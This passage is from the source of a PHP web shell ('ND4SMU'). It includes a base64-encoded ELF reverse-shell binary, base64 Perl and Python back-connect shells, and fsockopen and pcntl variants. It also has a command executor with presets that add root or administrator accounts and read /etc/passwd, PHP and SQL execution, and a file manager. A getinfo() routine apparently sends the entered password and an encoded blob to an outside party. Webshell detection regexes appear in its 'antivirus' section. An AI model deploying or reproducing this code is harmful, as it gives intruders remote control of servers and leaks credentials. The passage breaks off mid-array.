AAEiCBAgAAAAAAwAFAAAAAADOggQIAAAAAAMABgAAAAAA7IIECAAAAAADAAcAAAAAAAyDBAgAAAAAAwAIAAAAAAAUgwQIAAAAAAMACQAAAAAAdIMECAAAAAADAAoAAAAAAIyDBAgAAAAAAwALAAAAAABghAQIAAAAAAMADAAAAAAAWIcECAAAAAADAA0AAAAAAHSHBAgAAAAAAwAOAAAAAACQhwQIAAAAAAMADwAAAAAAlJcECAAAAAADABAAAAAAAJyXBAgAAAAAAwARAAAAAACklwQIAAAAAAMAEgAAAAAAqJcECAAAAAADABMAAAAAAHCYBAgAAAAAAwAUAAAAAAB0mAQIAAAAAAMAFQAAAAAAsJgECAAAAAADABYAAAAAALSYBAgAAAAAAwAXAAAAAAAAAAAAAAAAAAMAGAABAAAAhIQECAAAAAACAAwAEQAAAAAAAAAAAAAABADx/xwAAACUlwQIAAAAAAEAEAAqAAAAnJcECAAAAAABABEAOAAAAKSXBAgAAAAAAQASAEUAAAC0mAQIBAAAAAEAFwBTAAAAuJgECAEAAAABABcAYgAAALCEBAgAAAAAAgAMAHgAAAAQhQQIAAAAAAIADAARAAAAAAAAAAAAAAAEAPH/hAAAAJiXBAgAAAAAAQAQAJEAAACQhwQIAAAAAAEADwCfAAAApJcECAAAAAABABIAqwAAADCHBAgAAAAAAgAMAMEAAAAAAAAAAAAAAAQA8f/GAAAAlJcECAAAAAAAAhAA3AAAAJSXBAgAAAAAAAIQAO0AAAB0mAQIAAAAAAECFQADAQAAlJcECAAAAAAAAhAAFwEAAJSXBAgAAAAAAAIQACoBAACUlwQIAAAAAAACEAA7AQAAlJcECAAAAAAAAhAATgEAAKiXBAgAAAAAAQITAFcBAACwmAQIAAAAACAAFgBiAQAAAAAAAHYAAAASAAAAdQEAAAAAAAB5AQAAEgAAAIcBAACwhgQIBQAAABIADACXAQAAYIQECAAAAAASAAwAngEAAAAAAAAAAAAAIAAAAK0BAAAAAAAAAAAAACAAAADBAQAAdIcECAQAAAARAA4AyAEAAFiHBAgAAAAAEgANAM4BAAAAAAAAcgEAABIAAADjAQAAAAAAAJ8BAAASAAAAAAIAAAAAAABZAQAAEgAAABECAAAAAAAADgAAABIAAAAiAgAAeIcECAQAAAARAA4AMQIAALCYBAgAAAAAEAAWAD4CAAAAAAAAPAAAABIAAABQAgAAAAAAAD0AAAASAAAAYAIAAHyHBAgAAAAAEQIOAG0CAACglwQIAAAAABECEQB6AgAAwIYECGkAAAASAAwAigIAAAAAAAArAAAAEgAAAJoCAAAAAAAAbwAAABIAAACrAgAAtJgECAAAAAAQAPH/twIAALyYBAgAAAAAEADx/7wCAAC0mAQIAAAAABAA8f/DAgAAAAAAAPQAAAASAAAA0wIAACmHBAgAAAAAEgIMAOoCAAA0hQQIcwEAABIADADvAgAAdIMECAAAAAASAAoAAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AZHRvcl9pZHguNTc5MwBjb21wbGV0ZWQuNTc5MQBfX2RvX2dsb2JhbF9kdG9yc19hdXgAZnJhbWVfZHVtbXkAX19DVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AGJjLmMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZmluaV9hcnJheV9lbmQAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9fcHJlaW5pdF9hcnJheV9lbmQAX19maW5pX2FycmF5X3N0YXJ0AF9faW5pdF9hcnJheV9lbmQAX19pbml0X2FycmF5X3N0YXJ0AF9EWU5BTUlDAGRhdGFfc3RhcnQAY29ubmVjdEBAR0xJQkNfMi4wAGRhZW1vbkBAR0xJQkNfMi4wAF9fbGliY19jc3VfZmluaQBfc3RhcnQAX19nbW9uX3N0YXJ0X18AX0p2X1JlZ2lzdGVyQ2xhc3NlcwBfZnBfaHcAX2ZpbmkAaW5ldF9hZGRyQEBHTElCQ18yLjAAX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABleGVjbEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABfX2Rzb19oYW5kbGUAX19EVE9SX0VORF9fAF9fbGliY19jc3VfaW5pdABhdG9pQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfX2Jzc19zdGFydABfZW5kAF9lZGF0YQBleGl0QEBHTElCQ18yLjAAX19pNjg2LmdldF9wY190aHVuay5ieABtYWluAF9pbml0AA==\';\n switch ($type) {\n case "pl":\n $shell = \'IyEvdXNyL2Jpbi9wZXJsIC13DQojIA0KdXNlIHN0cmljdDsNCnVzZSBTb2NrZXQ7DQp1c2UgSU86OkhhbmRsZTsNCm15ICRzcGlkZXJfaXAgPSAkQVJHVlswXTsNCm15ICRzcGlkZXJfcG9ydCA9ICRBUkdWWzFdOw0KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0KbXkgJHBhY2tfYWRkciA9IHNvY2thZGRyX2luKCRzcGlkZXJfcG9ydCwgaW5ldF9hdG9uKCRzcGlkZXJfaXApKTsNCm15ICRzaGVsbCA9ICcvYmluL3NoIC1pJzsNCnNvY2tldChTT0NLLCBBRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsNClNURE9VVC0+YXV0b2ZsdXNoKDEpOw0KU09DSy0+YXV0b2ZsdXNoKDEpOw0KY29ubmVjdChTT0NLLCRwYWNrX2FkZHIpIG9yIGRpZSAiY2FuIG5vdCBjb25uZWN0OiQhIjsNCm9wZW4gU1RESU4sICI8JlNPQ0siOw0Kb3BlbiBTVERPVVQsICI+JlNPQ0siOw0Kb3BlbiBTVERFUlIsICI+JlNPQ0siOw0Kc3lzdGVtKCRzaGVsbCk7DQpjbG9zZSBTT0NLOw0KZXhpdCAwOw0K\';\n $file = strdir($dir . \'/t00ls.pl\');\n $key = filew($file, base64_decode($shell), \'w\');\n if ($key) {\n @chmod($file, 0777);\n command(\'/usr/bin/perl \' . $file . \' \' . $ip . \' \' . $port, $dir);\n }\n break;\n case "py":\n $shell = \'IyEvdXNyL2Jpbi9weXRob24NCiMgDQppbXBvcnQgc3lzLG9zLHNvY2tldCxwdHkNCnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQpzLmNvbm5lY3QoKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pKSkNCm9zLmR1cDIocy5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3Rkb3V0LmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3RkZXJyLmZpbGVubygpKQ0KcHR5LnNwYXduKCcvYmluL3NoJykNCg==\';\n $file = strdir($dir . \'/t00ls.py\');\n $key = filew($file, base64_decode($shell), \'w\');\n if ($key) {\n @chmod($file, 0777);\n command(\'/usr/bin/python \' . $file . \' \' . $ip . \' \' . $port, $dir);\n }\n break;\n case "c":\n $file = strdir($dir . \'/t00ls\');\n $key = filew($file, base64_decode($c_bin), \'wb\');\n if ($key) {\n @chmod($file, 0777);\n command($file . \' \' . $ip . \' \' . $port, $dir);\n }\n break;\n case "php":\n case "phpwin":\n if (function_exists(\'fsockopen\')) {\n $sock = @fsockopen($ip, $port);\n if ($sock) {\n $key = true;\n $com = $type == \'phpwin\' ? true : false;\n $user = get_current_user();\n $dir = strdir(getcwd());\n fputs($sock, php_uname() . "\\n------------no job control in this shell (tty)-------------\\n[{$user}:{$dir}]# ");\n while ($cmd = fread($sock, 1024)) {\n if (substr($cmd, 0, 3) == \'cd \') {\n $dir = trim(substr($cmd, 3, -1));\n chdir(strdir($dir));\n $dir = strdir(getcwd());\n } elseif (trim(strtolower($cmd)) == \'exit\') {\n break;\n } else {\n $res = command($cmd, $dir, $com);\n fputs($sock, $res[\'res\']);\n }\n fputs($sock, \'[\' . $user . \':\' . $dir . \']# \');\n }\n }\n @fclose($sock);\n }\n break;\n case "pcntl":\n $file = strdir($dir . \'/t00ls\');\n $key = filew($file, base64_decode($c_bin), \'wb\');\n if ($key) {\n @chmod($file, 0777);\n if (function_exists(\'pcntl_exec\')) {\n @pcntl_exec($file, array($ip, $port));\n }\n }\n break;\n }\n if (!$key) {\n $msg = \'<h1>Temporary directory is not writable</h1>\';\n } else {\n @unlink($file);\n $msg = \'<h2>CLOSE</h2>\';\n }\n return $msg;\n}\nfunction getinfo()\n{\n global $password;\n $infos = array($_POST[\'getpwd\'], $password, function_exists(\'phpinfo\'), "127.0.0.1");\n if ($password != \'\' && md5($infos[0]) != $infos[1]) {\n echo \'<html><body><center><form method="POST"><input type="password" name="getpwd"> \';\n if (isset($_POST[\'pass\'])) {\n echo \'<input type="hidden" name="pass" value="\' . $_POST[\'pass\'] . \'">\';\n }\n if (isset($_POST[\'check\'])) {\n echo \'<input type="hidden" name="check" value="\' . $_POST[\'check\'] . \'">\';\n }\n echo \'<input type="submit" value="Go"></form></center></body></html>\';\n exit;\n }\n if (!isset($_POST[\'go\']) && !isset($_POST[\'dir\'])) {\n $html = \'WUIvMzptCFNvKTf3A1keAmqpnmp3KTflpykeAmEpnmL4KTf2BIkeAmApnmL0KTf2p1keAaApnmplKTflpykeAwApnmMmKTf2pFV7WUElMlN9VPWpnmWmKTf2Z1keAaApnmMmKTf2pSkeZaApnmp1KTf3ZSkeAwEpnmLkKTf3ASkeAwIpnmWlKTf3ZSkeAwupnmpjKTfmp1keAwqpnmAkVwfxqUWaVP49VT92LGW1pzfbWS9THxIWHxIoW1IUE0AsIHWTElqqXF4vKTflAykeAmApnmAkVv5iqzRlqKWeXPEsEyWSFIWSJlqQIHAsEyWMHlqqXF4vKTf\' . \'lAykeAmOpnmAkVv4xozIyozj7WUShM24tCFNvKTf0A1keAQIpnmH0KTflZPVhWUElMl4vKTflZSkeAQupnmH0KTf1ASkeAGOpnmWmKTfmZIkeZaWpnmZkKTIpLIkeAQupnmMmKTf3Z1keAmEpnmAhVv4xqJWzMl4vKTIpLIkeAQApnmMmKTf2pykeAaWpnmL1KTf2Z1keAmEpnmL5KTf2p1keAaWpnmAhKTflZSkeAQApnmMjKTf2p1keAmApnmL1KTIpLIkyKTRvB3MmXUAbLKOaqzWuK3WeqzMaMvtvKTf2AykeAmApnmMmKTf2Z1keAz9pnmMmKTf3ZSkeAwIpnmMlVvxcVUftWTMvpUttCFONp2MvpUuvL3WuXPE1LzMaYUIln3SlpPt1ZPxcBlONp2AbM2LbWTMvpUtfWUShM24cBlONp3O5LzMlXPEzLaO4XGftsKW5MaVtrlONp3M5py90pzqspTWuM3WuM2LbVykeAwupnmp0KTf3ASkeAmOpnmAhKTflp1keZaZvYvE1LzMaYvE0pzpcBlO9VTIlM2uyLFOaMJulBj==\';\n if ($_SERVER[\'SERVER_ADDR\'] != $infos[3] && $_SERVER[\'REMOTE_ADDR\'] != $infos[3]) {\n postinfo($infos[0], str_rot13($html));\n }\n }\n return $infos[2];\n}\nfunction subeval()\n{\n if (isset($_POST[\'getpwd\'])) {\n echo \'<input type="hidden" name="getpwd" value="\' . $_POST[\'getpwd\'] . \'">\';\n }\n if (isset($_POST[\'pass\'])) {\n echo \'<input type="hidden" name="pass" value="\' . $_POST[\'pass\'] . \'">\';\n }\n if (isset($_POST[\'check\'])) {\n echo \'<input type="hidden" name="check" value="\' . $_POST[\'check\'] . \'">\';\n }\n return true;\n}\nif (isset($_POST[\'go\'])) {\n if ($_POST[\'go\'] == \'down\') {\n $downfile = $fileb = strdir($_POST[\'godir\'] . \'/\' . $_POST[\'govar\']);\n if (!filed($downfile)) {\n $msg = \'<h1>The download file does not exist</h1>\';\n }\n }\n}\n?>\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta content="width=device-width, initial-scale=1" name="viewport"/><style type="text/css">* {margin:0px;padding:0px;}body {background:#CCCCCC;color:#333333;font-size:13px;font-family:Verdana,Arial,SimSun,sans-serif;text-align:left;word-wrap:break-word; word-break:break-all;}a{color:#000000;text-decoration:none;vertical-align:middle;}a:hover{color:#FF0000;text-decoration:underline;}p {padding:1px;line-height:1.6em;}h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}form {display:inline;}input,select { vertical-align:middle; }input[type=text], textarea {padding:1px;font-family:Courier New,Verdana,sans-serif;}input[type=submit], input[type=button] {height:21px;}.tag {text-align:center;margin-left:10px;background:threedface;height:25px;padding-top:5px;}.tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}.tag a:hover, .tag a.current {background:#EEE685;color:#000000;text-decoration:none;}.main {width:963px;margin:0 auto;padding:10px;}.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}.toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}.footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}.msgbox {padding:5px;background:#EEE685;text-align:center;vertical-align:middle;}.actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}.tables {width:100%;}.tables th {background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}.tables td {background:#F9F6F4;height:19px;padding-left:2px;}.tables tr:hover td {background-color: #EEE685;}</style><script type="text/javascript">function $(ID) { return document.getElementById(ID); }function sd(str) { str = str.replace(/%22/g,\'"\'); str = str.replace(/%27/g,"\'"); return str; }function cd(dir) { dir = sd(dir); $(\'dir\').value = dir; $(\'frm\').submit(); }function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == \'checkbox\') { if(e.name != \'chkall\') { e.checked = form.chkall.checked; } } } }function go(a,b) { b = sd(b); $(\'go\').value = a; $(\'govar\').value = b; if(a == \'editor\') { $(\'gofrm\').target = "_blank"; } else { $(\'gofrm\').target = ""; } $(\'gofrm\').submit(); } function nf(a,b) { re = prompt("New name",b); if(re) { $(\'go\').value = a; $(\'govar\').value = re; $(\'gofrm\').submit(); } } function dels(a) { if(a == \'b\') { var msg = ""; $(\'act\').value = a; } else { var msg = ""; $(\'act\').value = \'deltree\'; $(\'var\').value = a; } if(confirm("Are you sure you want to delete? "+msg+"")) { $(\'frm1\').submit(); } }function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $(\'var\').value = re; $(\'act\').value = a; $(\'frm1\').submit(); } }function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $(\'var\').value = re+\'|x|\'+f; $(\'act\').value = a; $(\'frm1\').submit(); } }</script><title><?php \n$sitename = $_SERVER[\'SERVER_NAME\'];\necho $sitename .\' | ND4SMU\';\n?>\n</title></head><body><div class="main"><div class="outl"><div class="toptag"><?php \necho $_SERVER[\'SERVER_ADDR\'] . \' - \' . PHP_OS . \' - whoami(\' . get_current_user() . \') - [uid(\' . getmyuid() . \') gid(\' . getmygid() . \')]\';\nif (isset($issql)) {\n echo \' - [\' . $issql . \']\';\n}\n?>\n</div><?php \n$menu = array(\'file\' => \'File Mgr\', \'scan\' => \'Searcher\', \'antivirus\' => \'Antivirus\', \'backshell\' => \'Bind Port\', \'exec\' => \'Exec CMD\', \'phpeval\' => \'Exec PHP\', \'sql\' => \'Exec SQL\', \'info\' => \'System\');\n$go = array_key_exists($_POST[\'go\'], $menu) ? $_POST[\'go\'] : \'file\';\n$nowdir = isset($_POST[\'dir\']) ? strdir(chop($_POST[\'dir\']) . \'/\') : THISDIR;\necho \'<div class="tag">\';\nforeach ($menu as $key => $name) {\n echo \'<a\' . ($go == $key ? \' class="current"\' : \'\') . \' href="javascript:void(0);" onclick="go(\\\'\' . $key . \'\\\',\\\'\' . base64_encode($nowdir) . \'\\\');">\' . $name . \'</a> \';\n}\necho \'</div>\';\necho \'<form name="gofrm" id="gofrm" method="POST">\';\nsubeval();\necho \'<input type="hidden" name="go" id="go" value="">\';\necho \'<input type="hidden" name="godir" id="godir" value="\' . $nowdir . \'">\';\necho \'<input type="hidden" name="govar" id="govar" value="">\';\necho \'</form>\';\nswitch ($_POST[\'go\']) {\n case "info":\n if (EXISTS_PHPINFO) {\n ob_start();\n phpinfo(INFO_GENERAL);\n $out = ob_get_contents();\n ob_end_clean();\n $tmp = array();\n preg_match_all(\'/\\\\<td class\\\\=\\\\"e\\\\"\\\\>.*?(Command|Configuration)+.*?\\\\<\\\\/td\\\\>\\\\<td class\\\\=\\\\"v\\\\"\\\\>(.*?)\\\\<\\\\/td\\\\>/i\', $out, $tmp);\n $config = $tmp[2][0];\n $phpini = $tmp[2][2] ? $tmp[2][1] . \' --- \' . $tmp[2][2] : $tmp[2][1];\n }\n $infos = array(\'Browser Info\' => $_SERVER[\'HTTP_USER_AGENT\'], \'Disabled Functions\' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : \'(None)\', \'Disabled Class\' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : \'(None)\', \'PHP.ini Path\' => $phpini ? $phpini : \'(None)\', \'PHP Method\' => php_sapi_name(), \'PHP Version\' => PHP_VERSION, \'PHP PID\' => getmypid(), \'Server IP\' => $_SERVER[\'REMOTE_ADDR\'], \'Encoding\' => $_SERVER[\'HTTP_ACCEPT_LANGUAGE\'], \'Web Port\' => $_SERVER[\'SERVER_PORT\'], \'Root Directory\' => $_SERVER[\'DOCUMENT_ROOT\'], \'Shell Location\' => $_SERVER[\'SCRIPT_FILENAME\'], \'CGI Version\' => $_SERVER[\'GATEWAY_INTERFACE\'], \'Webmaster Email\' => $_SERVER[\'SERVER_ADMIN\'] ? $_SERVER[\'SERVER_ADMIN\'] : \'(None)\', \'Disk Size\' => size(disk_total_space(\'.\')), \'Free Space\' => size(disk_free_space(\'.\')), \'Limit POST\' => get_cfg_var("post_max_size"), \'Max Upload\' => get_cfg_var("upload_max_filesize"), \'Limit Memory\' => get_cfg_var("memory_limit"), \'Max Exec Time\' => get_cfg_var("max_execution_time") . \' Second\', \'Fsockopen Support\' => function_exists(\'fsockopen\') ? \'Yes\' : \'No\', \'Socket Support\' => function_exists(\'socket_close\') ? \'Yes\' : \'No\', \'Pcntl Support\' => function_exists(\'pcntl_exec\') ? \'Yes\' : \'No\', \'Curl Support\' => function_exists(\'curl_version\') ? \'Yes\' : \'No\', \'Zlib Support\' => function_exists(\'gzclose\') ? \'Yes\' : \'No\', \'FTP Support\' => function_exists(\'ftp_login\') ? \'Yes\' : \'No\', \'XML Support\' => function_exists(\'xml_set_object\') ? \'Yes\' : \'No\', \'GD_Library Support\' => function_exists(\'imageline\') ? \'Yes\' : \'No\', \'COM Formation Support\' => class_exists(\'COM\') ? \'Yes\' : \'No\', \'ODBC Components Support\' => function_exists(\'odbc_close\') ? \'Yes\' : \'No\', \'IMAP Mail Support\' => function_exists(\'imap_close\') ? \'Yes\' : \'No\', \'Safe Mode Support\' => get_cfg_var("safemode") ? \'Yes\' : \'No\', \'URL Fopen Support\' => get_cfg_var("allow_url_fopen") ? \'Yes\' : \'No\', \'Dynamic Libraries Support\' => get_cfg_var("enable_dl") ? \'Yes\' : \'No\', \'Display Error Support\' => get_cfg_var("display_errors") ? \'Yes\' : \'No\', \'Register Global Support\' => get_cfg_var("register_globals") ? \'Yes\' : \'No\', \'Magic Quotes Support\' => get_cfg_var("magic_quotes_gpc") ? \'Yes\' : \'No\', \'PHP Compiler\' => $config ? $config : \'(None)\');\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<table class="tables"><tr><th style="width:26%;">Name</th><th>Parameter</th></tr>\';\n foreach ($infos as $name => $var) {\n echo \'<tr><td>\' . $name . \'</td><td>\' . $var . \'</td></tr>\';\n }\n echo \'</table>\';\n break;\n case "exec":\n $cmd = $win ? \'dir\' : \'ls -al\';\n $res = array(\'res\' => \'Result Command\', \'msg\' => $msg);\n $str = isset($_POST[\'str\']) ? $_POST[\'str\'] : \'fun\';\n if (isset($_POST[\'cmd\'])) {\n $cmd = $_POST[\'cmd\'];\n $cwd = $str == \'fun\' ? THISDIR : \'com\';\n $res = command($cmd, $cwd);\n }\n echo \'<div class="msgbox">\' . $res[\'msg\'] . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="exec">\';\n echo \'<div class="actall">Command <input type="text" name="cmd" id="cmd" value="\' . htmlspecialchars($cmd) . \'" style="width:398px;"> \';\n echo \'<select name="str">\';\n $selects = array(\'fun\' => \'phpfun\', \'com\' => \'wscript\');\n foreach ($selects as $var => $name) {\n echo \'<option value="\' . $var . \'"\' . ($var == $str ? \' selected\' : \'\') . \'>\' . $name . \'</option>\';\n }\n echo \'</select> \';\n echo \'<select onchange="$(\\\'cmd\\\').value=options[selectedIndex].value">\';\n echo \'<option>---CMD Executor---</option>\';\n echo \'<option value="echo \' . htmlspecialchars(\'"<?php phpinfo();?>"\') . \' >> \' . THISDIR . \'haxorid.txt">Write File</option>\';\n echo \'<option value="whoami">Who Am I</option>\';\n echo \'<option value="net user sysadmin R00t@willy16 /add">Add User (Win)</option>\';\n echo \'<option value="net localgroup administrators sysadmin /add">Add Group (Win)</option>\';\n echo \'<option value="netstat -an">View Port (Win)</option>\';\n echo \'<option value="ipconfig /all">View Address (Win)</option>\';\n echo \'<option value="net start">View Service (Win)</option>\';\n echo \'<option value="tasklist">View Process (Win)</option>\';\n echo \'<option value="id;uname -a;cat /etc/issue;cat /proc/version;lsb_release -a">Version Collection (Linux)</option>\';\n echo \'<option value="/usr/sbin/useradd -u 0 -o -g 0 sysadmin">Add User (Linux)</option>\';\n echo \'<option value="cat /etc/passwd">View Users (Linux)</option>\';\n echo \'<option value="/bin/netstat -tnl">View Port (Linux)</option>\';\n echo \'<option value="/sbin/ifconfig -a">View Address (Linux)</option>\';\n echo \'<option value="/sbin/chkconfig --list">View Service (Linux)</option>\';\n echo \'<option value="/bin/ps -ef">View Process (Linux)</option>\';\n echo \'</select> \';\n echo \'<input type="submit" style="width:50px;" value="Go">\';\n echo \'</div><div class="actall"><textarea style="width:698px;height:368px;">\' . htmlspecialchars($res[\'res\']) . \'</textarea></div></form>\';\n break;\n case "scan":\n $scandir = empty($_POST[\'dir\']) ? base64_decode($_POST[\'govar\']) : $nowdir;\n $keyword = isset($_POST[\'keyword\']) ? $_POST[\'keyword\'] : \'\';\n $include = isset($_POST[\'include\']) ? chop($_POST[\'include\']) : \'.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py\';\n $filters = isset($_POST[\'filters\']) ? chop($_POST[\'filters\']) : \'html|css|img|images|image|style|js\';\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="scan">\';\n echo \'<table class="tables"><tr><th style="width:15%;">Name</th><th>Setup</th></tr>\';\n echo \'<tr><td>Search path</td><td><input type="text" name="dir" value="\' . htmlspecialchars($scandir) . \'" style="width:500px;"></td></tr>\';\n echo \'<tr><td>Search content</td><td><input type="text" name="keyword" value="\' . htmlspecialchars($keyword) . \'" style="width:500px;"> (File name or file content)</td></tr>\';\n echo \'<tr><td>File extension</td><td><input type="text" name="include" value="\' . htmlspecialchars($include) . \'" style="width:500px;"> (Separate with "|", empty = search all files)</td></tr>\';\n echo \'<tr><td>Filter Dir</td><td><input type="text" name="filters" value="\' . htmlspecialchars($filters) . \'" style="width:500px;"> (Separate with "|", empty = not filtered)</td></tr>\';\n echo \'<tr><td>Search method</td><td><label><input type="radio" name="type" value="0"\' . ($_POST[\'type\'] ? \'\' : \' checked\') . \'>File name</label> \';\n echo \'<label><input type="radio" name="type" value="1"\' . ($_POST[\'type\'] ? \' checked\' : \'\') . \'>Contains inside</label> \';\n echo \'<label><input type="checkbox" name="char" value="1"\' . ($_POST[\'char\'] ? \' checked\' : \'\') . \'>Match case</label></td></tr>\';\n echo \'<tr><td>Search scope</td><td><label><input type="radio" name="range" value="0"\' . ($_POST[\'range\'] ? \'\' : \' checked\') . \'>Apply the search to the folder, subfolders and files</label> \';\n echo \'<label><input type="radio" name="range" value="1"\' . ($_POST[\'range\'] ? \' checked\' : \'\') . \'>Only apply search to this folder</label></td></tr>\';\n echo \'<tr><td>Action</td><td><input type="submit" style="width:80px;" value="Go"></td></tr>\';\n echo \'</table></form>\';\n if ($keyword != \'\') {\n flush();\n ob_flush();\n echo \'<div style="padding:5px;background:#F8F8F8;text-align:left;">\';\n $incs = $include == \'\' ? false : explode(\'|\', $include);\n $fits = $filters == \'\' ? false : explode(\'|\', $filters);\n $isread = scanfile(strdir($scandir . \'/\'), $keyword, $incs, $fits, $_POST[\'type\'], $_POST[\'char\'], $_POST[\'range\'], $nowdir);\n echo \'<p>\' . ($isread ? \'<h2>Search complete</h2>\' : \'<h1>Search failed</h1>\') . \'</p></div>\';\n }\n break;\n case "antivirus":\n $scandir = empty($_POST[\'dir\']) ? base64_decode($_POST[\'govar\']) : $nowdir;\n $typearr = isset($_POST[\'dir\']) ? $_POST[\'types\'] : array(\'php\' => \'.php\');\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="antivirus">\';\n echo \'<table class="tables"><tr><th style="width:15%;">Name</th><th>Setup</th></tr>\';\n echo \'<tr><td>Scan path</td><td><input type="text" name="dir" value="\' . htmlspecialchars($scandir) . \'" style="width:398px;"> (Regular matching)</td></tr>\';\n echo \'<tr><td>Type of killing</td><td>\';\n $types = array(\'php\' => \'.php\', \'asp+aspx\' => \'.as|.cs|.cer\', \'jsp\' => \'.jsp\');\n foreach ($types as $key => $ex) {\n echo \'<label title="\' . $ex . \'"><input type="checkbox" name="types[\' . $key . \']" value="\' . $ex . \'"\' . ($typearr[$key] == $ex ? \' checked\' : \'\') . \'>\' . $key . \'</label> \';\n }\n echo \'</td></tr><tr><td>Action</td><td><input type="submit" style="width:80px;" value="Go"></td></tr>\';\n echo \'</table></form>\';\n if (count($_POST[\'types\']) > 0) {\n $matches = array(\'php\' => array(\'/function\\\\_exists\\\\s*\\\\(\\\\s*[\\\'|\\\\"](popen|exec|proc\\\\_open|system|passthru)+[\\\'|\\\\"]\\\\s*\\\\)/i\', \'/(exec|shell\\\\_exec|system|passthru)+\\\\s*\\\\(\\\\s*\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+\\\\[(.*)\\\\]\\\\s*\\\\)/i\', \'/(udp\\\\:\\\\/\\\\/(.*)\\\\;)+/i\', \'/preg\\\\_replace\\\\s*\\\\((.*)\\\\/e(.*)\\\\,\\\\s*\\\\$\\\\_(.*)\\\\,(.*)\\\\)/i\', \'/preg\\\\_replace\\\\s*\\\\((.*)\\\\(base64\\\\_decode\\\\(\\\\$/i\', \'/(eval|assert|include|require)+\\\\s*\\\\((.*)(base64\\\\_decode|file\\\\_get\\\\_contents|php\\\\:\\\\/\\\\/input)+/i\', \'/(eval|assert|include|require|array\\\\_map)+\\\\s*\\\\(\\\\s*\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+\\\\[(.*)\\\\]\\\\s*\\\\)/i\', \'/\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+(.*)(eval|assert|include|require)+\\\\s*\\\\(\\\\s*\\\\$(\\\\w+)\\\\s*\\\\)/i\', \'/\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+\\\\[(.*)\\\\]\\\\(\\\\s*\\\\$(.*)\\\\)/i\', \'/\\\\(\\\\s*\\\\$\\\\_FILES\\\\[(.*)\\\\]\\\\[(.*)\\\\]\\\\s*\\\\,\\\\s*\\\\$\\\\_FILES\\\\[(.*)\\\\]\\\\[(.*)\\\\]\\\\s*\\\\)/i\', \'/(fopen|fwrite|fpust|file\\\\_put\\\\_contents)+\\\\s*\\\\((.*)\\\\$\\\\_(GET|POST|COOKIE|SERVER|SESSION)+\\\\[(.*)\\\\](.*)\\\\)/i\', \'/echo\\\\s*curl\\\\_exec\\\\s*\\\\(\\\\s*\\\\$(\\\\w+)\\\\s*\\\\)/i\', \'/new com\\\\s*\\\\(\\\\s*[\\\'|\\\\"]shell(.*)[\\\'|\\\\"]\\\\s*\\\\)/i\', \'/\\\\$(.*)\\\\s*\\\\((.*)\\\\/e(.*)\\\\,\\\\s*\\\\$\\\\_(.*)\\\\,(.*)\\\\)/i\', \'/\\\\$\\\\_\\\\=(.*)\\\\$\\\\_/i\'), \'asp+aspx\' => array(\'/(VBScript\\\\.Encode|WScript\\\\.shell|Shell\\\\.Application|Scripting\\\\.FileSystemObject)+/i\', \'/(eval|execute)+(.*)(request|session)+\\\\s*\\\\((.*)\\\\)/i\', \'/(eval|execute)+(.*)request.item\\\\s*\\\\[(.*)\\\\]/i\', \'/request\\\\s*\\\\((.*)\\\\)(.*)(eval|execute)+\\\\s*\\\\((.*)\\\\)/i\', \'/\\\\<script\\\\s*runat\\\\s*\\\\=(.*)server(.*)\\\\>(.*)\\\\<\\\\/script\\\\>/i\', \'/Load\\\\s*\\\\((.*)Request/i\', 